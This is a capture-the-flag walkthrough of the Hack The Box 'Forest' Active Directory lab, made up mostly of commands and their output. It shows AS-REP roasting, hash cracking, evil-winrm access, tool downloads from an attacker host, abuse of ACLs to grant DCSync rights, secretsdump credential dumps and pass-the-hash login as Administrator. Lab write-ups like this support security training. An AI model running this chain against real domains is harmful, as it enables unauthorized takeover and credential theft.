Forest
Forest is a easy HTB lab that focuses on active directory, disabled kerberos pre-authentication and privilege escalation. In this walkthrough, we will go over the process of exploiting the services and gaining access to the root user.
Recon
The first step in any penetration testing process is reconnaissance. We can start by running nmap scan on the target machine to identify open ports and services.
[★]$ sudo nmap -p- -sV -sC 10.129.13.212
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-06 09:02 GMT
Nmap scan report for 10.129.13.212
Host is up (0.017s latency).
Not shown: 65511 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-06 09:10:42Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
57183/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-01-06T09:11:31
|_ start_date: 2024-01-06T08:57:08
|_clock-skew: mean: 2h46m49s, deviation: 4h37m09s, median: 6m48s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2024-01-06T01:11:33-08:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.16 seconds
Adding new domains to /etc/hosts
. sudo tee --append /etc/hosts <<< "10.129.13.212 dc.htb.local htb.local"
Enumerating the LDAP data:
$ ldapsearch -x -H ldap://10.129.13.212 -b "dc=htb,dc=local"
$ ldapsearch -x -H ldap://10.129.13.212 -b "dc=htb,dc=local" | grep sAMAccountName
$ rpcclient -N -U '' 10.129.13.212
rpcclient $> querydispinfo
index: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000010 Account: Administrator Name: Administrator Desc: Built-in account for administering the computer/domain
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy Name: Andy Hislip Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x2352 RID: 0x478 acb: 0x00000210 Account: HealthMailbox0659cc1 Name: HealthMailbox-EXCH01-010 Desc: (null)
index: 0x234b RID: 0x471 acb: 0x00000210 Account: HealthMailbox670628e Name: HealthMailbox-EXCH01-003 Desc: (null)
index: 0x234d RID: 0x473 acb: 0x00000210 Account: HealthMailbox6ded678 Name: HealthMailbox-EXCH01-005 Desc: (null)
index: 0x2351 RID: 0x477 acb: 0x00000210 Account: HealthMailbox7108a4e Name: HealthMailbox-EXCH01-009 Desc: (null)
index: 0x234e RID: 0x474 acb: 0x00000210 Account: HealthMailbox83d6781 Name: HealthMailbox-EXCH01-006 Desc: (null)
index: 0x234c RID: 0x472 acb: 0x00000210 Account: HealthMailbox968e74d Name: HealthMailbox-EXCH01-004 Desc: (null)
index: 0x2350 RID: 0x476 acb: 0x00000210 Account: HealthMailboxb01ac64 Name: HealthMailbox-EXCH01-008 Desc: (null)
index: 0x234a RID: 0x470 acb: 0x00000210 Account: HealthMailboxc0a90c9 Name: HealthMailbox-EXCH01-002 Desc: (null)
index: 0x2348 RID: 0x46e acb: 0x00000210 Account: HealthMailboxc3d7722 Name: HealthMailbox-EXCH01-Mailbox-Database-1118319013 Desc: (null)
index: 0x2349 RID: 0x46f acb: 0x00000210 Account: HealthMailboxfc9daad Name: HealthMailbox-EXCH01-001 Desc: (null)
index: 0x234f RID: 0x475 acb: 0x00000210 Account: HealthMailboxfd87238 Name: HealthMailbox-EXCH01-007 Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda Name: Lucinda Berger Desc: (null)
index: 0x236a RID: 0x47f acb: 0x00000210 Account: mark Name: Mark Brandt Desc: (null)
index: 0x236b RID: 0x480 acb: 0x00000210 Account: santi Name: Santi Rodriguez Desc: (null)
index: 0x235c RID: 0x479 acb: 0x00000210 Account: sebastien Name: Sebastien Caron Desc: (null)
index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb Name: Microsoft Exchange Migration Desc: (null)
index: 0x2161 RID: 0x46c acb: 0x00020011 Account: SM_1ffab36a2f5f479cb Name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9} Desc: (null)
index: 0x2156 RID: 0x464 acb: 0x00020011 Account: SM_2c8eef0a09b545acb Name: Microsoft Exchange Approval Assistant Desc: (null)
index: 0x2159 RID: 0x467 acb: 0x00020011 Account: SM_681f53d4942840e18 Name: Discovery Search Mailbox Desc: (null)
index: 0x2158 RID: 0x466 acb: 0x00020011 Account: SM_75a538d3025e4db9a Name: Microsoft Exchange Desc: (null)
index: 0x215c RID: 0x46a acb: 0x00020011 Account: SM_7c96b981967141ebb Name: E4E Encryption Store - Active Desc: (null)
index: 0x215b RID: 0x469 acb: 0x00020011 Account: SM_9b69f1b9d2cc45549 Name: Microsoft Exchange Federation Mailbox Desc: (null)
index: 0x215d RID: 0x46b acb: 0x00020011 Account: SM_c75ee099d0a64c91b Name: Microsoft Exchange Desc: (null)
index: 0x2157 RID: 0x465 acb: 0x00020011 Account: SM_ca8c2ed5bdab4dc9b Name: Microsoft Exchange Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco Name: svc-alfresco Desc: (null)
User
Using this information, we can create the user.txt . We can use this list to check which account do not have Kerberos pre-authentication disabled:
[★]$ GetNPUsers.py -usersfile users.txt -request -format hashcat -dc-ip 10.129.13.212 'htb.local/'
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
...
[-] User HealthMailboxc0a90c9 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
...
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
$krb5asrep$23$svc-alfresco@HTB.LOCAL:0fd9cf833e13e3bb64e0e1726176e386$33ae4feaba7de00ce4232cd4cf0fc864694ca6bf3b310baf93335269868fee0802b1a5eb4ce848876f3a4fef128900c88c0720e7be92f5e24d2fb6320b0b5dd07ba2a89655bb1df5c2709ff64c5899ebd3dcf7dc05abc4d2e86fde46d12a59a0309bfe98b46f11464530009c5d7bf837d13c76815446f1092d7257bbb04776142155dec4c6b2ddb92de25d06b9428df93bbb33090e253a8245d3cecfdd21b4dac636d96919c2c31953c973673382bdad680c9855bb1af1a11ee603da747ef1dbf3037e8561e6b75eca7c20c66d582df36325872506d10b7651ee21bd2dd474d20210e47b5943
Cracking hash with $ hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt
and got password for username svc-alfresco
as ***v***
.
Getting the flag:
[★]$ evil-winrm -i 10.129.13.212 -u svc-alfresco -p ***v***
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> type ..\Desktop\user.txt
~~~~~~~~~~~~FLAG~~~~~~~~~~~~
Privilege Escalation
Checking permissions:
*Evil-WinRM* PS C:\Users\svc-alfresco> net user /domain svc-alfresco
User name svc-alfresco
Full Name svc-alfresco
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/6/2024 1:30:38 AM
Password expires Never
Password changeable 1/7/2024 1:30:38 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/6/2024 1:26:14 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *Service Accounts
The command completed successfully.
Getting active directory graph using SharpHound
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> wget http://10.10.14.119:8000/SharpHound.exe -o SharpHound.exe
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> .\SharpHound.exe
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download "C:/Users/svc-alfresco/Documents/20240106013631_BloodHound.zip"
Using neo4j and bloodhound, got the following information to move forward.
svc-alfresco --MemberOf--> SERVICE ACCOUNTS@HTB.LOCAL --MemberOf--> PRIVILEGED IT ACCOUNTS@HTB.LOCAL --MemberOf--> ACCOUNT OPERATORS@HTB.LOCAL ACCOUNT OPERATORS@HTB.LOCAL --GenericAll--> EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL --WriteDacl--> HTB.LOCAL
Searching for GenericAll exploit
, found online - https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse#genericall-on-group
Effectively, this allows us to add ourselves (the user svc-alfresco) to the EXCHANGE WINDOWS PERMISSIONS
group:
> net group "EXCHANGE WINDOWS PERMISSIONS" svc-alfresco /add /domain
Searching for WriteDacl exploit
, found online - https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/acl-abuse#abuse-writedacl
Setup:
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> wget http://10.10.14.119:8000/Powermad.ps1 -o Powermad.ps1; Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> wget http://10.10.14.119:8000/PowerView.ps1 -o PowerView.ps1; Import-Module .\PowerView.ps1
Attack1 :
$ ldapsearch -x -H ldap://10.129.13.212 -b "DC=htb,DC=local"
$ python3 DCSync.py -dc dc.htb.local -t 'CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local' 'htb.local\svc-alfresco:s3rvice'
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[*] Starting DCSync Attack against CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
[*] Initializing LDAP connection to dc.htb.local
[*] Using htb.local\svc-alfresco account with password ***
[*] LDAP bind OK
[*] Initializing domainDumper()
[*] Initializing LDAPAttack()
[*] Querying domain security descriptor
[-] Error when updating ACL: {'result': 50, 'description': 'insufficientAccessRights', 'dn': '', 'message': '00000005: SecErr: DSID-03152870, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0\n\x00', 'referrals': None, 'type': 'modifyResponse'}
Attack2 :
> net user john s3rvice /add /domain
> net group "EXCHANGE WINDOWS PERMISSIONS" john /add /domain
> net localgroup "Remote Management Users" john /add
> $SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
> $Cred = New-Object System.Management.Automation.PSCredential('htb\john', $SecPassword)
> Add-ObjectAcl -Credential $Cred -PrincipalIdentity 'john' -Rights DCSync
Now we get the dump of the secrets:
$ secretsdump.py john:s3rvice@htb.local
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b************32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
...
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
...
Getting flag:
$ evil-winrm -i 10.129.13.212 -u administrator -H 32693b************32c72a07ceea6
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
~~~~~~~~~~~~FLAG~~~~~~~~~~~~